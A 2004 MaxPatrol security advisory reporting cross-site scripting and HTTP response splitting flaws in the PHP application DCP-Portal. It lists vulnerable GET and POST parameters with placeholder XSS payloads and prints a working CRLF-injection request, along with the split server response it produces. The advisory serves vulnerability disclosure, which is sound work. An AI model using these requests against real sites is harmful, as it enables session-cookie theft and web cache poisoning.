[Maxpatrol Security Advisory] Multiple vulnerabilities in DCP-Portal
Title: [Maxpatrol Security Advisory] Multiple vulnerabilities in
DCP-Portal
Date: 28.09.2004
Severity: Low
Application: DCP-Portal, dcp-portal
Platform: PHP
I. DESCRIPTION
--------------
Multiple vulnerabilities were found in DCP-Portal. A remote user can
conduct cross-site scripting attacks and HTTP response splitting
attacks.
<p>
1. XSS in GET
/calendar.php?year=[XSS code here]&month=09&day=01
/calendar.php?year=2004&month=[XSS code here]&day=01
/calendar.php?year=2004&month=09&day=[XSS code here]
/index.php?page=annoucements&cid=[XSS code here]
/annoucement.php?aid=8&cid=[XSS code here]
/news.php?nid=34&cid=[XSS code here]
/contents.php?cid=[XSS code here]
/index.php?cid=[XSS code here]
2. XSS in post
POST /index.php?page=send_write HTTP/1.1
Host: dcp-portal
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
PHPSESSID=1&yname=1&yadd=1&fname=1&fadd=1&url=[XSS code here]
POST /search.php HTTP/1.1
Host: dcp-portal
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
PHPSESSID=1&q=XSS code here]&fields=1
POST /register.php HTTP/1.1
Host: dcp-portal
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
PHPSESSID=1&sex=1&sex=1&name=1&surname=1&email=scanner@xxxxxxxxxxxxxx&ad
dres
s=1&zip=1&city=1&country=[XSS code here]
3. HTTP response splitting
POST /calendar.php?show=full_month HTTP/1.1
Host: dcp-portal
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
PHPSESSID=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0a
Cont
ent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a%3chtml%3eSca
nned
%20by%20PTsecurity%3c/html%3e%0d%0a&s=1&submit=1
Result
<...>
(Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4
PHP/4.3.8 FrontPage/5.0.2.2634a mod_ssl/2.8.19 OpenSSL/0.9.7a
X-Powered-By: PHP/4.3.8
Set-Cookie: PHPSESSID=
Content-Length: 0
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 34
<html>Scanned by PTsecurity</html>
; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Transfer-Encoding: chunked
Content-Type: text/html
<...>
II. IMPACT
----------
A remote user can access the target user's cookies (including
authentication cookies). A remote user may be able to poison any
intermediate web caches with arbitrary content.
III. SOLUTION
-------------
Not available currently.
IV. VENDOR FIX/RESPONSE
-----------------------
n/a
V. CREDIT
-------------
This vulnerability was discovered by Positive Technologies using
MaxPatrol (www.maxpatrol.com) - intellectual professional security
scanner. It is able to detect a substantial amount of vulnerabilities
not published yet. MaxPatrol's intelligent algorithms are also capable
to detect a lot of vulnerabilities in custom web-scripts (XSS, SQL and
code injections, HTTP Response splitting).